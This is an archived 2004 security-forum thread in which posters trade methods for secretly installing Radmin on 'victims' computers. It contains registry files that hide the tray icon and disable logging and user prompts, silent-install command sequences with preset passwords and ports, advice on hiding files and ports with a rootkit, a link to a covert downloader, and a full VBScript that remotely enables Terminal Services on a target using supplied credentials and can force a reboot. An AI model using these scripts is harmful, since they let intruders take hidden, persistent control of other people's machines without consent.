Radmin Run Silently

GovernmentSecurity.org > The Archives > General Network Security

extreme

Feb 14 2004, 02:58 AM

I saw somewhere command line and instruction on how to do this, but I can't find it now... So if someone can please write, I would be thankfull..

I wish to run Radmin on victims comp so I can go to Control Panel>>Components Install, and then install Terminal Service and Terminal Licence from there...

Is there any better program for this, which allows me to see and control someone desktop and programs?

x1`

Feb 14 2004, 03:06 AM

the only problem is getting it to hide in the bar along the bottom on windows xp

anyone know how to hide it

phaeton

Feb 14 2004, 03:11 AM

I wrote myself a script in NSIS which all you do is a site exec, it installs the service, hides the tray icon, sets a password and starts the service all in one convenient package. That way I have radmin completely hidden under my rootkit.

x1`

Feb 14 2004, 03:22 AM

please can u post it here

i really could be doing with something liek this

Zekk

Feb 14 2004, 04:47 AM

same ^

eXist

Feb 14 2004, 06:06 AM

Give it a go by changing radmin.reg to:

CODE

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:23,13,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

Save it.
As for the site exec command, use this in FlashFXP, or something similar:

CODE

site exec regedit /s radmin.reg
site exec netvcs.exe /install /silence
site exec net start netvcs
site exec netvcs /pass:password /save /silence
site exec netvcs /start /silence

Please note, it is netvcs, because that's what my .exe is called. Also, you can save all this into one command to make things easier.

saetji

Feb 14 2004, 12:00 PM

QUOTE

c:
cd c:\winnt\system32\
explore /install /silence
explore /port:31337 /pass:HACKED /save /silence
regedit /s 1.reg
del 1.reg
net start r_server
cd..

where 1.reg is:

QUOTE

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00

This will hide the icon and install the thing silently ...

btw as u might have guessed - those aren't my passes/port info - so dont get any ideas

paskaluis

Feb 14 2004, 03:12 PM

thx for the 1.reg code

saetji

Feb 14 2004, 03:48 PM

your welcome - i got tons of code - just cant be arsed to sift through 300gb of disk space to find the useful stuff

phaeton

Feb 14 2004, 05:29 PM

Later today I'll post my NSIS installer script.

extreme

Feb 14 2004, 07:06 PM

you posted different values for
DisableTrayIcon"=hex:01,00,00,00
and
DisableTrayIcon"=hex:00,00,00,00
What is right one?

P.S. Does anyone know what is command for BAT file autodelete itself when executed?

x1`

Feb 14 2004, 07:19 PM

so just make this a batch file and run the batch file then?

saetji

Feb 14 2004, 07:35 PM

the one i use hides the tray icon

AsuKa

Feb 14 2004, 07:44 PM

QUOTE

DisableTrayIcon"=hex:01,00,00,00

That is the value you want to hide tray, I have noticed that sometimes on XP it doesnt want to hide the tray icon, only happened twice where I couldn't get it to hide, anyone else experience this with XP?

Stephen79

Feb 14 2004, 07:51 PM

this is what i use:

CODE

dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000

Copkill

Feb 14 2004, 08:00 PM

CODE

dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AutoAllow=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000

extreme

Feb 14 2004, 08:49 PM

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0

The newest version is 2.1... Have anyone checked if this Reg value changed then??

P.S. Is there any other RAT that allows controling desktop like Radmin? Maybe there are better and smaller tools and we are all stuck on RA....
Offcourse, it would have to be undetectable...
And is there some tool that allows controling of very own instance of Destkop which will be invisible to all other users. I mean just like in Terminal Services...

saetji

Feb 15 2004, 12:56 AM

theres remote anything - u only upload a 30k file i think with it and eits encrypted so only u can axs it

BUT
i think its detected by most antiviruses + its a hassle to change

phaeton

Feb 15 2004, 05:59 AM

you can use winvnc... and that regkey value is correct, famatech just uses an old string to put their values in. sorry about the lack of the nsis package, was out all day today, tomorrow i promse

Edvon

Feb 17 2004, 12:05 AM

QUOTE (extreme @ Feb 14 2004, 08:49 PM)

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0

The newest version is 2.1... Have anyone checked if this Reg value changed then??

QUOTE

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00

works fine with 2.1 :thumbsup:

ellitio

Feb 17 2004, 12:13 AM

and execute the following commands:

regedit /s c:\winnt\system32\radmin.reg
c:\winnt\system32\r_server.exe /install /silence
c:\winnt\system32\r_server.exe /pass:PASSWORDHERE /port:4899 /save /silence
c:\winnt\system32\r_server.exe /start /silence

installs radmin with a password of PASSWORDHERE on port 4899

(it hides the tray icon! + NO logfile)

-=KD=-

Feb 19 2004, 03:36 PM

thx for the code guys

and btw, send ur hdd over I'll take care of it for u

Zekk

Feb 19 2004, 04:22 PM

thx just what I wanted will try radmin insted of terminal service

saetji

Feb 19 2004, 05:22 PM

send me over a coupla thousand pounds and i'll send u my hd

jimmy

Feb 19 2004, 10:30 PM

to autodelete bat ?? lol is this really a question ? what could it be ?
if bat is called
install.bat, just put a last line into it like del install.bat
>> Damn that was hard to think off

o0oKARo0o

Feb 20 2004, 01:35 AM

I try to unpack radmin so i can modify the service name etc but there is no way i can find the packr that has been used..
Anyone knows how to unpack it??

phaeton

Feb 20 2004, 04:37 AM

there is a app in the filedownloads section (which you dont have access to). just search for xnet in google, it modifies services and you can modify the service name AFTER its installed.

illwill

Feb 20 2004, 05:17 AM

eiltio i'd appreciate it if you didnt name your .rar after my program of the same name

http://www.illmob.org/0day/illmob_apps/ghostradmin.zip
which is the webdler i coded a few months back that downloads the radmin files into someone and installs it silently

--Elite--

Feb 20 2004, 07:32 AM

there is a faster way to install Radmin /Ts on ur victim ( maybe ur server

)

for Radmin , Install and configure the server on your own system ,
( for beeing hidden configure it as it hide the tray icon )
and then , extract the settings from the registery by Regedit .

would be something like this :

QUOTE

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:f0,12,00,00
"Parameter"=hex:8c,c1,b9,ff,7b,d7,a0,fc,96,1d,2f,67,b0,f7,82,5a
"NTAuthEnabled"=hex:00,00,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

then upload this .reg file + the server.exe file + 2 DLL`s wich are
required ( Admdll.dll and Raddrv.dll ) to the victim pc .
install the reg key by this command :
" regedit -s radmin.reg "
then run the server ( for example RD-server.exe ) with NO switch .
then connect

for more privacy , u can use a rootkit , to hide the port u used
and the files u`ve uploaded , and excuted on the server .
don`t forget . u have 3 files and 1 process to hide by ur rootkit !
if it`s possible for u ( better say for ur rootkit

) try to hide the
comunication ports too .

and for installing Tertminal service ( Remote Desktop ) remotely ,
the best way is to use already avalable scripts . these just need
access to RPC service and of cource an administrator level account .

here is batch file wich install it (TS) ( works locally ! )

QUOTE

echo off
@echo :::::::::::::::::::::::::::::::::::::
@echo ::: Auto Terminal Service enabler :::
@echo ::: works on XP/2000 . :::
@echo ::: By --Elite-- :::
@echo :::::::::::::::::::::::::::::::::::::
@echo (=-)Processing batch jobe..."
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "AllowTSConnections"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AutoAdminLogon"="1">> c:\TS.reg
@echo (=-)Registering the service...
REGEDIT /S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
@echo (=-)Service registered succesfully !
@echo (=-)Service would start on next reboot:)
@echo (=-)connect to default port ( 3389 )
@echo :::::::::::::::::::::::::::::::::::::

but for remote installation u can use this one .
it`s a VBE script. copy/paste it into a .vbe file
and run it like this

cscript TS-enable.vbe

hint : DO NOT use default port if u wanna stay anonymous
although there are easy/quick ways to determine is
TS is installed on a system or not .

QUOTE

on error resume next

set outstreem=wscript.stdout

set instreem=wscript.stdin

if (lcase(right(wscript.fullname,11))="wscript.exe") then

set objShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))

wscript.quit

end if

if wscript.arguments.count<3 then

usage()

wscript.echo "Not enough parameters."

wscript.quit

end if

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

if wscript.arguments.count>3 then

port=wscript.arguments(3)

else

port=3389

end if

if not isnumeric(port) or port<1 or port>65000 then

wscript.echo "The number of port is error."

wscript.quit

end if

if wscript.arguments.count>4 then

reboot=wscript.arguments(4)

else

reboot=""

end if

usage()

outstreem.write "Conneting "&ipaddress&" ...."

set objlocator=createobject("wbemscripting.swbemlocator")

set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)

showerror(err.number)

objswbemservices.security_.privileges.add 23,true

objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."

set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")

for each objinstoscaption in colinstoscaption

if instr(objinstoscaption.caption,"Server")>0 then

wscript.echo "OK!"

else

wscript.echo "OS type is "&objinstoscaption.caption

outstreem.write "Do you want to cancel setup?[y/n]"

strcancel=instreem.readline

if lcase(strcancel)<>"n" then wscript.quit

end if

next

outstreem.write "Writing into registry ...."

set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

HKLM=&h80000002

HKU=&h80000003

with objinstreg

.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"

.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0

.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"

.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2

.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"

.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port

end with

showerror(err.number)

rebt=lcase(reboot)

flag=0

if rebt="/r" or rebt="-r" or rebt="\r" then flag=2

if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6

if flag<>0 then

outstreem.write "Now, reboot target...."

strwqlquery="select * from win32_operatingsystem where primary='true'"

set colinstances=objswbemservices.execquery(strwqlquery)

for each objinstance in colinstances

objinstance.win32shutdown(flag)

next

showerror(err.number)

else

wscript.echo "You need to reboot target."&vbcrlf&"Then,"

end if

wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)

if errornumber Then

wscript.echo "Error 0x"&cstr(hex(err.number))&" ."

if err.description <> "" then

wscript.echo "Error description: "&err.description&"."

end if

wscript.quit

else

wscript.echo "OK!"

end if

end function

function usage()

wscript.echo string(79,"*")

wscript.echo "ROTS v1.05"

wscript.echo "Remote Open Terminal services Script, by ??"

wscript.echo "Welcome to visite www.5458.net"

wscript.echo "Usage:"

wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"

wscript.echo "port: default number is 3389."

wscript.echo "/r: auto reboot target."

wscript.echo "/fr: auto force reboot target."

wscript.echo string(79,"*")&vbcrlf

end function

hope these help u .

Edvon

Feb 20 2004, 02:00 PM

QUOTE (--Elite-- @ Feb 20 2004, 07:32 AM)

then upload this .reg file + the server.exe file + 2 DLL`s wich are
required ( Admdll.dll and Raddrv.dll )

Is the Raddrv.dll really required?

--Elite--

Feb 20 2004, 06:59 PM

Edvon ,
I really never tested it .
i recommend , only cus it`s included in the directory of Radmin .
it maybe required for the client part . i did NOT tested .
i add this one , cus i usually use the tunneling ability of radmin ,
and thought myself it maybe needed

ellitio

Feb 20 2004, 08:17 PM

QUOTE (illwill @ Feb 20 2004, 05:17 AM)

eiltio i'd appreciate it if you didnt name your .rar after my program of the same name

http://www.illmob.org/0day/illmob_apps/ghostradmin.zip
which is the webdler i coded a few months back that downloads the radmin files into someone and installs it silently

ghostradmin.zip is already been maded before you made it....
and it's not .zip but .rar

illwill

Feb 20 2004, 11:16 PM

first off i made my program in september of last year.. secondly who the (filtered) cares if its in a .zip or .rar its still called the same name as my program ...

Edvon

Feb 21 2004, 01:04 AM

@--Elite--
Its not required for the client and the server does also work without it...well ermm :dunno:

--Elite--

Feb 21 2004, 07:25 AM

Hi again

Dear Edvon
I had some search about Raddrv.dll ,
it`s not required , but BETTER TO HAVE .
as i found on the vendor site`s forum
this dll is a middleware , for transfering movements for remote-desktop
controll . Radmin do not capture screen to make it visible for u .
raddrv.dll get some basic info. from the video controller of os , transfer them
to the client part , and the client rebuild the screen for u , up on that info
it act like a remote AGP slot

this is why Radmin is so fast in refreshing the screen with high Q.

so , if we upload thisdll , we would have a faster/better comunication.

this is the orginal post i found :

QUOTE

VI. Common questions

How does the screen update so fast?
The raddrv.dll is a video hook driver that reads the graphical output of the screen as it is
being generated by the video drivers. Instead of screen dumping it is only sending specific
data as to areas of the screen that have changed since the last frame. This allows for less
network traffic and better screen quality. The bitmaps are highly compressed and encrypted
using the fast Twofish algorithm. The client and server are constantly comparing small notes on
what needs to be updated on the client's screen. This is an awesome feature of Radmin.

Edvon

Feb 21 2004, 11:16 AM

Dear --Elite-- ^^

nice research

W4r3X

Feb 23 2004, 02:22 PM

Thx For Radmin Silence

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.